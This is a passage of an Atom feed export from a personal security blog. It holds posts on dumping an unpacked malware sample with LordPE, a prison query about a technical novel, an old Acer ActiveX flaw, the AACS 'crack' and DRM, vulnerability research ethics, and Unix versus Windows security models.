He even made a screenshot of what settings I should use:&lt;br /&gt;&lt;div style="width: 240px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/631993/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/631993_d30d23379b_m.jpg" alt="lordpe" style="border: 1px solid rgb(0, 0, 0);" border="0" height="156" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sure enough, I used LordPE and it dumped perfectly. I'd had good luck with imprec before. Nicolas had shown me the tool in his class. Before that I had been doing raw memory dumps and manually naming offsets. No fun. So I've had a tendency to reach for imprec because I'm used to it.&lt;br /&gt;&lt;br /&gt;But, there was no arguing with the fact that LordPE worked for me in this case, and imprec didn't. So part of what I planned to do with this post was to recommend LordPE. So I repeated the steps on my home machine so I could take screenshots and so on. When I got to the step where I was going to show the bad dump made by imprec... I found that it had dumped it perfectly.&lt;br /&gt;&lt;br /&gt;Thinking back, I believe the reason imprec didn't work before was that I had done it on a work machine, which was Windows XP x64. When I tried to use imprec on the 64-bit Windows, I had a problem with some of the imports not being valid. That probably had to do with why it wasn't writing out the import table properly. I had removed the "bad" imports, but it probably just broke the process. I &lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;think&lt;/span&gt;&lt;/span&gt; I was able to use LordPE on the same machine, but now I'm going to have to go back and check.&lt;br /&gt;&lt;br /&gt;Which brings me to a general point about tools. If you've got tools you use that dig into the guts of a system, then those tools are probably going to quit working when you move to a newer system. 
This is especially true of tools for which development has ceased (which seems to be the case with imprec.) If it's not being actively maintained, then it will eventually "expire" when the OS moves on. On my home machine, which is regular XP, imprec still works fine. Further, malware and packers tend to account for popular tools by implementing countermeasures. So, if you plan to keep up on reverse engineering, you should also plan to keep looking for the latest and greatest tools.&lt;br /&gt;&lt;br /&gt;But in any case, my thanks to Jason for encouraging me to check out LordPE and for fixing my mistake. Back to the techie bits.&lt;br /&gt;&lt;br /&gt;I'll skip the imprec demo for now. If you're interested in me spelling out the same steps for imprec, leave me a comment, and I'll write it up. In LordPE, you basically run the tool, find the process you still have paused at the OEP in your debugger, right-click it and select dump full:&lt;br /&gt;&lt;div style="width: 212px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/629148/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/629148_c1e4ee8264_m.jpg" alt="lordpe1" style="border: 1px solid rgb(0, 0, 0);" border="0" height="240" width="212" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;In this particular case at least, you now have a good copy of the unpacked executable, and you can load it up in your favorite analysis tool:&lt;br /&gt;&lt;div style="width: 240px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/629147/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/629147_038ddd3e15_m.jpg" alt="unpacked1" style="border: 1px solid rgb(0, 0, 0);" border="0" height="176" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;If you're curious, the binary is a fairly typical call-home-to-an-IRC-C&amp;amp;C bot.&lt;br /&gt;&lt;br /&gt;Notes:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Sorry 
about the pictures, the arrangement isn't ideal. If you click on one, you can drill down a couple of levels and see the full size so you can read it. I'll probably try tweaking the pictures to work a bit better. Any Blogger and/or Zooomr advice is welcome.&lt;/li&gt;&lt;li&gt;I realize I've got a weird mix of beginner and advanced topics here. Sorry about that. Again, this is at least partially to remind myself as well. If you liked the post and want me to take the tech level up or down, let me know. It probably won't be hard to talk me into writing about it more.&lt;/li&gt;&lt;li&gt;Both Nicolas and Jason teach this topic as a training attached to security conferences. Nicolas teaches it at &lt;a href="http://recon.cx/en/training.html"&gt;RECON&lt;/a&gt;. I don't know for sure yet if Nicolas will be teaching this year. Jason has taught at &lt;a href="http://www.blackhat.com/html/bh-usa-06/train-bh-us-06-sl-advmal.html"&gt;Black Hat&lt;/a&gt;, but it doesn't look like the Black Hat training schedule for this year has been announced yet either. 
I'll post an update if I find out anything about either of them teaching again.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-6541410089045297062?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6541410089045297062/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6541410089045297062' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6541410089045297062'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6541410089045297062'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/01/unpacking-i.html' title='Unpacking I'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4362522521120484560</id><published>2007-01-09T11:34:00.000-08:00</published><updated>2007-01-09T11:53:37.419-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Voicemail from bureau of prisons</title><content type='html'>I walked into the office this morning, and glanced at my phone. It said I had 7 new callers since I left yesterday. Now, I'm not much of a phone person. I hate them. 
I think that comes from a brief stint I did on the help desk phones at Bechtel.&lt;br /&gt;&lt;br /&gt;So, most people know not to call me. I scrolled through the caller-ID list, and there were 6 calls from the same number within about an hour. The number didn't look familiar. Curious, I checked my voicemail, which is something else I rarely do. A man identified himself as being from the IT department of the bureau of prisons, said he had a question for me about a request from an inmate for a book that I wrote the foreword for, and would I please call him.&lt;br /&gt;&lt;br /&gt;Uh, sure.&lt;br /&gt;&lt;br /&gt;Turns out that someone had put in a request for &lt;a href="http://www.amazon.com/Stealing-Network-How-Own-Continent/dp/1931836051/thievco"&gt;How to Own a Continent&lt;/a&gt;. His opening question was "This isn't fiction, is it?". I explained that it IS fiction, in that none of the events happened, but that we try to keep the technical details real. So yes, it's half fiction, and half technical book. By the time I had called him, he had already taken note of the price and where it is supposed to be shelved, and decided on his own that it didn't qualify as a novel. He made it sound like he had a copy in front of him, which I guess he wasn't planning to forward to the inmate.&lt;br /&gt;&lt;br /&gt;I feel a little bad for the inmate who probably won't get to see it now, but I wasn't going to lie about it. I didn't try to grill the prison IT guy, or argue with him about his policies. I figure that was probably pretty futile. Maybe I'll call him back at some point and see if there's anything he is allowed to tell me about which prison this is or the name of the inmate. 
I assume he can't, but you never know.&lt;br /&gt;&lt;br /&gt;If the inmate in question ever sees this: When you get out, or if you transfer somewhere where they are a little more lenient about your reading material, I'll get you a copy.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-4362522521120484560?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4362522521120484560/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=4362522521120484560' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4362522521120484560'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4362522521120484560'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/01/voicemail-from-bureau-of-prisons.html' title='Voicemail from bureau of prisons'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4946103772997560657</id><published>2007-01-08T22:20:00.000-08:00</published><updated>2007-01-08T22:46:17.763-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Eight year old ActiveX control with vulnerability</title><content type='html'>&lt;span class="bodytext2"&gt;Tan Chew Keong recently &lt;a href="http://vuln.sg/acerlunchapp-en.html"&gt;found&lt;/a&gt; &lt;/span&gt;an ActiveX 
control on his Acer laptop that allows for arbitrary file execution. I had read this a month or so ago, but was reminded again by today's Slashdot &lt;a href="http://yro.slashdot.org/article.pl?sid=07/01/08/0515200"&gt;story&lt;/a&gt;. I haven't looked into the technical details, but they seem pretty plain.&lt;br /&gt;&lt;br /&gt;If this is in fact from 1998, then I am amazed by how long this thing has gone unnoticed.&lt;br /&gt;I'd love to know how many copies of this thing are out in the world. I would hope not a lot, given that it escaped notice for so many years.&lt;br /&gt;&lt;br /&gt;I can't decide if this is evidence against many eyes, or evidence for the idea that less popular software doesn't get any attention.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-4946103772997560657?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4946103772997560657/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=4946103772997560657' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4946103772997560657'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4946103772997560657'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/01/eight-year-old-activex-control-with.html' title='Eight year old ActiveX control with vulnerability'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5353137407700380590</id><published>2007-01-08T18:28:00.000-08:00</published><updated>2007-01-08T21:54:52.456-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RE'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>AACS Cracked?</title><content type='html'>It seems that &lt;a href="http://www.aacsla.com/specifications/"&gt;AACS&lt;/a&gt; has been reported to be "cracked". Someone by the name of muslix64 &lt;a href="http://forum.doom9.org/showthread.php?t=119871"&gt;claims&lt;/a&gt; to have created a &lt;a href="http://rapidshare.com/files/8318838/BackupHDDVD.zip.html"&gt;program&lt;/a&gt; that: &lt;blockquote&gt;is a tool to decrypt a AACS protected movie that you own, so you can play it back later using an HDDVD player software.&lt;/blockquote&gt;He also says right up front that it's not complete as-is: &lt;blockquote&gt;This software don't provide any cryptographic keys, so you have to add your own keys.&lt;/blockquote&gt;There used to be a video on YouTube that showed it being used, I imagine. I haven't seen the video. The link to the YouTube video now shows:&lt;blockquote&gt;This video has been removed at the request of copyright owner Warner Bros. Entertainment Inc. because its content was used without permission&lt;/blockquote&gt; If it's not clear, I haven't looked at this too hard. 
While it's interesting on some levels, I'm not interested in digging into the tech details just yet.&lt;br /&gt;&lt;br /&gt;What I find interesting is some of the reactions.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.freedom-to-tinker.com/?p=1104"&gt;Freedom to Tinker&lt;/a&gt;:&lt;blockquote&gt;Typical users can’t extract title keys on their own, so BackupHDDVD won’t be useful to them as it currently stands — hence the claims that BackupHDDVD is a non-event.&lt;/blockquote&gt;&lt;br /&gt;&lt;a href="http://hardware.slashdot.org/comments.pl?sid=213886&amp;cid=17384734"&gt;Slashdot&lt;/a&gt; (comments):&lt;blockquote&gt;the very clever fellow just implemented that publicly available decryption routine, and also discovered an (as of yet unreleased) method for obtaining decryption keys.&lt;/blockquote&gt;and&lt;blockquote&gt;Yes, and the Engadget article that is TFA is mistaken... He didn't supply any keys, just disc IDs (to map to human readable names of the discs). The place where the keys would have been were all stubbed out with all nulls.&lt;br /&gt;&lt;br /&gt;If this is a crack for the DRM, then GPG is a crack for PGP.&lt;/blockquote&gt;For the record, there was some &lt;a href="http://www.engadget.com/2006/12/27/aacs-drm-cracked-by-backuphddvd-tool/"&gt;confusion&lt;/a&gt; about whether the program shipped with any decryption keys or not. The Freedom to Tinker guys say no, I'll take their word for it.&lt;br /&gt;&lt;br /&gt;Now, the Freedom to Tinker guys certainly know the score, and I hope I'm not making it look otherwise by quoting them out of context. But the general feeling from some portion of the people reading about this is that it isn't a proper crack; it doesn't come with keys. 
They can't use it.&lt;br /&gt;&lt;br /&gt;They're missing the point, and what the guy is up to.&lt;br /&gt;&lt;br /&gt;The people who complain that they can't use it without keys are also likely going to need a GUI app that rips HD DVDs to MPEG files with a single big green button. As near as I can tell without trying it myself, this program looks something like a GUI with a button. Just add keys.&lt;br /&gt;&lt;br /&gt;So, where do you get keys? You get them from existing players, either hardware, firmware, or software. Who knows how to do that? Well, I could probably figure it out, if I had enough time. Please note that I'm not offering to find keys for you, I'm just saying that there are lots of us who do reverse engineering, who could probably figure it out.&lt;br /&gt;&lt;br /&gt;So, the programmer attempts to keep the most controversial piece of his code modular and updatable. Other people can supply the keys. Maybe he even hopes that he can escape some trouble by not having it be fully functional out of the box. I wish him luck with that, though it's not without precedent. There are a number of MP3 rippers that don't directly include the patented MP3 codec, and they require you to go find a copy of the &lt;a href="http://lame.sourceforge.net/index.php"&gt;LAME&lt;/a&gt; libraries which do. The CD ripper programs say they don't include the codec, and the LAME project &lt;a href="http://lame.sourceforge.net/about.php"&gt;says&lt;/a&gt; you may need a license for your ripper. I tend to think that the MP3 patent holders have just decided to be nice about it.&lt;br /&gt;&lt;br /&gt;A few points to make:&lt;br /&gt;&lt;br /&gt;Is it in any way surprising that AACS is cracked/decodable/implemented in a program that doesn't play the MPAA's way? No, not at all. It's inevitable. That's the basic problem with DRM. They give you a file that you're not supposed to be able to decode or decrypt. And then they hand you a decoder. 
Sure, they are hoping you won't look inside. But people are curious, and they like to be able to store their files on their own terms.&lt;br /&gt;&lt;br /&gt;Is this a "crack" in the proper sense of the word? Well, when I was a kid, "cracking" meant removing copy protection from floppy disks. So in that sense, yes, this is a proper crack. It's working around the little trick that is supposed to keep you from doing things the easy way. Now, if you're talking about something like cracking the security of a program (finding a vulnerability) or "cracking" a crypto algorithm (better term is "break"), then no, this is not that kind of crack.&lt;br /&gt;&lt;br /&gt;But that's not how you break DRM. You break DRM exactly like this guy did, by replicating the algorithm and/or keys. Sure, if there is ALSO a software vulnerability or bad crypto, that's interesting too. That happened with CSS, for example (crypto weakness), but you don't need that to get around DRM. You just need to replicate the function of the player.&lt;br /&gt;&lt;br /&gt;Frankly, when I simultaneously learned about this AACS crack and that there are a couple of existing Windows HD DVD players, it was obvious what happened. If you want to keep a secret, do not stick it in a Windows program. Reverse engineers LOVE to take apart Windows programs. If you're going to try and simultaneously keep a secret, and distribute it to every household in the world, then at least stick it in a secret ROM chip so that the likes of a &lt;a href="http://www.bunniestudios.com/wordpress/?p=143"&gt;Bunnie Huang&lt;/a&gt; are needed to get it out.&lt;br /&gt;&lt;br /&gt;So why is this different than PGP? Because you don't encrypt something with PGP, and then give a copy of the decryption key to everyone in the world, and ask them not to look. It wouldn't matter if every HD DVD came encrypted to your personal key either, since you have no incentive at all to keep the movie encrypted. 
What do you care if you give out the plaintext version of a movie?&lt;br /&gt;&lt;br /&gt;So, what happens now? Well, the AACS designers aren't all that stupid, they were aware this would happen. So there is a key revocation feature out there. This is where my ignorance kicks in. I don't know exactly how this feature works, but I'm going to make some educated guesses.&lt;br /&gt;&lt;br /&gt;There must be some set of keys in a Windows HD DVD player or physical device. I'm sure the AACS people issue a set to every vendor or manufacturer. The goal of the evil hax0r here is to swipe those keys, and probably give them to their buddies or post them on the Internet. So the AACS people figure out which keys have been leaked, and they revoke them. I'm guessing that on the next Disney DVD is a revocation list which the players will obey.&lt;br /&gt;&lt;br /&gt;Now, does that mean if the evil hax0rs stole the keys from a Panasonic HD DVD player, that the AACS people have to disable that player? Is it all Panasonic devices, or just that model, or just North American versions of that model, or what? The exact details probably aren't important. I think what it means is that yes, some legitimate Panasonic owner buys a legitimate DVD, and next thing they know, their player is bricked.&lt;br /&gt;&lt;br /&gt;Can they seriously be planning to do that? 
I can't see any plan where they can simultaneously cause the bad guys any significant trouble, and avoid screwing innocent customers.&lt;br /&gt;&lt;br /&gt;And that's why DRM sucks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5353137407700380590?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5353137407700380590/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5353137407700380590' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5353137407700380590'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5353137407700380590'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/01/aacs-cracked.html' title='AACS Cracked?'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5569816791278680762</id><published>2007-01-03T21:52:00.000-08:00</published><updated>2007-01-03T22:35:23.085-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Vulnerability Pimps</title><content type='html'>Marcus Ranum has written a very interesting &lt;a href="http://www.ranum.com/security/computer_security/editorials/codetools/index.html"&gt;article&lt;/a&gt; about code review, secure coding, Fortify, and vulnerability pimps. 
The meat of his article is about code review, and there are some real lessons to be learned there. You should take his comments to heart, and implement the review processes he recommends. I know I'm going to look into Fortify now.&lt;br /&gt;&lt;br /&gt;There are also some interesting minor insights into Marcus' history. Love him or hate him, you should &lt;span style="font-style: italic; font-weight: bold;"&gt;always&lt;/span&gt; pay attention to what Marcus has to say. He graciously added an &lt;a href="http://ranum.com/index.rss20"&gt;RSS feed&lt;/a&gt; to his site at my request, so please use it.&lt;br /&gt;&lt;br /&gt;That said, what I can't let go is "vulnerability pimps". I know, story of his life. He tries to tell people things, and they can only pay attention to his politics. Sorry about that, Marcus.&lt;br /&gt;&lt;br /&gt;So, yeah, vulnerability pimps. That's awesome. I'm sure he means for it to be pejorative, but for the folks he is describing, I can't see them taking too much offense. I can see the rise of the purple hat hackers even now.&lt;br /&gt;&lt;br /&gt;It's the first time I've heard the term, though maybe he didn't coin it. Google &lt;a href="http://archives.neohapsis.com/archives/dailydave/2005-q1/0248.html"&gt;says&lt;/a&gt; that Rodney Thayer (at least) used it in 2005. I see Marcus &lt;a href="http://archives.neohapsis.com/archives/sans/2006/0023.html"&gt;using&lt;/a&gt; it in February. Of course, Google doesn't know everything, so I'm happy to take corrections. I can't help but think of this as a Ranumism, though.&lt;br /&gt;&lt;br /&gt;As for my politics, I could be accused of encouraging, facilitating, and participating in vulnerability research. Though, not with as much skill as most other vulnerability pimps.&lt;br /&gt;&lt;br /&gt;I'll keep my counterpoint brief. Marcus throws out the "many eyes" catchphrase, specifically calling it a failure in the face of his findings. 
If one does not like independent vulnerability research taking place, then where do you think the checks that Fortify performs come from? If the developers and companies aren't going to look, who else will? If you expect the few eyes to be able to see, where are those eyes going to train?&lt;br /&gt;&lt;br /&gt;To be fair to Marcus, he just did the same thing himself. In fact, if I wanted to be extremely ungenerous, I could put him in the same category as the kid who just got a new fuzzer and went looking for problems. But he doesn't deserve that.&lt;br /&gt;&lt;br /&gt;The difference for him, as he points out, is that he thinks there's no benefit to touting his findings, (presumably) not even after the patch is out. He reports that everyone was cool, and they are going to get the fix out Real Soon Now. So he can get the problem fixed without the fanfare.&lt;br /&gt;&lt;br /&gt;I invite Marcus to finish the experiment, and give us an update later about the following:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Let us know if you will be taking credit for the finds.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Explain how pimping Fortify by searching for vulns in other people's software is different than eEye doing it to pimp Blink. 
&lt;/li&gt;&lt;li&gt;Tell us how long it takes the programmers to release the patch&lt;/li&gt;&lt;li&gt;Tell us whether the programmers properly acknowledge that this update fixes a security problem, and that people should update right away&lt;/li&gt;&lt;li&gt;Tell us if you spend the extra time to check that the patch correctly fixes the problem you identified&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5569816791278680762?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5569816791278680762/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5569816791278680762' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5569816791278680762'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5569816791278680762'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/01/vulnerability-pimps.html' title='Vulnerability Pimps'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1793278976349243532</id><published>2006-12-30T23:02:00.000-08:00</published><updated>2006-12-31T00:50:25.310-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Security models</title><content type='html'>This has been bouncing around in my head for 
years.  I still can't quite get it to form properly, maybe someone else can help.&lt;br /&gt;&lt;br /&gt;I've worked on a bunch of operating systems over the years.  I've forgotten all of the 8-bit ROM-based "operating systems", RSTS/E, CP/M, VMS, and most of Netware.  And of course I've forgotten the other ones I've forgotten. That leaves, more or less, DOS, Windows, and unix. And by "Windows" and "unix", I mean a bunch of different flavors. Though anymore if you sit me down in front of even Win9X, I'm a bit rusty there.&lt;br /&gt;&lt;br /&gt;I wouldn't really have any basis for understanding the security model of an OS more than 10 or 15 years ago, not beyond the overt features. "Overt" being stuff like username, passwords, and file permissions and ACLs. Mostly because I just didn't know that stuff back then, but also because the majority of stuff I touched by volume had no real protected memory model. There would have been a little bit in NT 3.1, and it was there in unix and VMS, but again, I had no real basis for grokking it.&lt;br /&gt;&lt;br /&gt;Point being, I learned my file permission stuff on Netware and VMS, and the more complicated things like process permissions and kernel and user separation on NT4 and later, and unix. Picking up NT-based Windows and unix was fortuitous, since that's where the market went. But that was a self-fulfilling thing, since I worked on what was popular. I actually managed to leave Netware behind about when I would have needed to learn about NDS, and I stopped doing any heavy-duty Windows admin about when AD became the dominant domain model for Windows. So I'm missing some directory services brain damage, too.&lt;br /&gt;&lt;br /&gt;I took all of the NT4 classes, but only bothered to take a couple of the tests. I took some user-level unix classes, but mostly picked it up on my own. 
I would say that the majority of my useful experience is on-the-job self-taught stuff.&lt;br /&gt;&lt;br /&gt;So why do I feel like I have the entire unix security model in my head, but I only have a tenuous grasp on some significant chunks of the Windows security model?&lt;br /&gt;&lt;br /&gt;I've done DOS and Windows far longer, though to be fair anything before about NT4 isn't really pertinent. I've done more Windows, too, in terms of hours spent.&lt;br /&gt;&lt;br /&gt;Obviously, part of the answer is that the unix model is just simpler. Everything's a file, you get owner, group, and world. There are a few special sticky bits. Everything runs as a user and gets its permissions the same way the filesystem works. Even the pipes are relatively simple. Kernel and user separation are clean. I understand what happens with environment and handle inheritance for child processes. I find the user database very easy to deal with. The typical init startup process is nice and simple. Signals are easy.&lt;br /&gt;&lt;br /&gt;Even when you add on things like NIS, full ACLs and SELinux, I think I'm following along just fine.&lt;br /&gt;&lt;br /&gt;Windows on the other hand...&lt;br /&gt;&lt;br /&gt;File permissions I'm good with. Same with the Registry, it's basically just another filesystem. Process permissions? I gather that they each have a privilege token, and sometimes privileges to change privileges and so on... I know there are a couple of different types of pipes, not sure what's going on with the security model there. Services can be running as different users or local system. There's the event system, I vaguely recall hearing about there being ACLs on that. And I get this sense that there's a ton of other things that I don't even know about.&lt;br /&gt;&lt;br /&gt;What happens when Windows boots? When I log in, what process(es) are creating my processes, and what, I get a set of tokens as well? 
When I change a password, what is happening with permissions that ultimately write my new hash out?&lt;br /&gt;&lt;br /&gt;It just starts falling apart for me.&lt;br /&gt;&lt;br /&gt;Now, I don't think I'm incapable of learning it. But part of the point is that I never made any concerted effort to learn either security model.  Yet, unix feels like it's right there with minimal effort, and Windows is making me work for it. If I ever catch up with Windows, it will be because I made the effort to track down and study some serious documentation. And I'm not opposed to that, I just haven't done it.  Pointers to favorite docs welcome.&lt;br /&gt;&lt;br /&gt;Part of what I've concluded about this is that the unix model is superior. And that's "superior" in the practical sense that if you can understand it, it's going to work better for you. I'll happily admit that the Windows model might be more expressive, maybe allowing you finer-grain control. But that does me no good.&lt;br /&gt;&lt;br /&gt;I think another reason that the unix model works much better is because unix itself is far, FAR more modular. I can strip a unix box down to the floorboards, leaving it with no functionality other than the purpose for which it exists. I've done this before with firewalls, various servers, and so on.&lt;br /&gt;&lt;br /&gt;Many unix functions do not have a lot of interdependency. I can kill off portmapper, and not have it disable the majority of my administrative tools. Configuration storage is just as likely to be a text file, which I can change by hand, and not need a front end tool for. I can turn off the damn GUI.&lt;br /&gt;&lt;br /&gt;And this is where I start to not be able to articulate it much better. Anyone else have a more elegant way to explain what I'm trying to get at? Do anyone else's experiences even match mine? 
I have to assume they do, since there's a big correlation between security people and unix fans.&lt;br /&gt;&lt;br /&gt;OS X is a slightly different beast. It has (for me) a lot of the obscurity of Windows layered on top of unix. I got nothing when it comes to the mach kernel or the Window manager. But even so, with the unix underpinnings, I am in a much better position to pick up the rest. I can already see where they have made horrible permissions mistakes.&lt;br /&gt;&lt;br /&gt;In any case, I'd like to have this be a proper essay someday, and I could use the help explaining it better. I'd love some feedback, even if it's just "me too" or "you're high."</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1793278976349243532/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=1793278976349243532' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1793278976349243532'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1793278976349243532'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/12/security-models.html' title='Security models'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6309814738583655517</id><published>2006-12-10T21:06:00.000-08:00</published><updated>2006-12-10T21:46:40.658-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Negative vulnerabilities?</title><content type='html'>As part of the recent &lt;a href="http://ryanlrussell.blogspot.com/2006/12/nothing-wrong-with-agents.html"&gt;discussion&lt;/a&gt; having to do with agents introducing new vulnerabilities to a system, I've been thinking. Everyone agrees that adding software means adding vulnerabilities.  Even if you're one of the best at writing bug-free software like &lt;a href="http://www-cs-faculty.stanford.edu/%7Eknuth/"&gt;Knuth&lt;/a&gt; or &lt;a href="http://cr.yp.to/djb.html"&gt;DJB&lt;/a&gt;, you still make the occasional mistake.  (Even if DJB hates to admit it.)&lt;br /&gt;&lt;br /&gt;Richard Bejtlich mentions it again while &lt;a href="http://taosecurity.blogspot.com/2006/12/matasano-is-right-about-agents.html"&gt;commenting&lt;/a&gt; on the agent discussion.&lt;br /&gt;&lt;blockquote&gt;Worse, as is the case &lt;i&gt;any time&lt;/i&gt; you add code to a platform, you are &lt;i&gt;adding vulnerabilities&lt;/i&gt;.&lt;/blockquote&gt;Of course, I understand fully what people are saying when they say this, and I'm not trying to disagree.  But that got me thinking.&lt;br /&gt;&lt;br /&gt;Now, you can't have a negative number of vulnerabilities in your own code.  At best, the theoretical minimum is 0.  But could you, by adding code, remove &lt;span style="font-style: italic;"&gt;someone else's vulnerabilities&lt;/span&gt;?  I think it might be possible.&lt;br 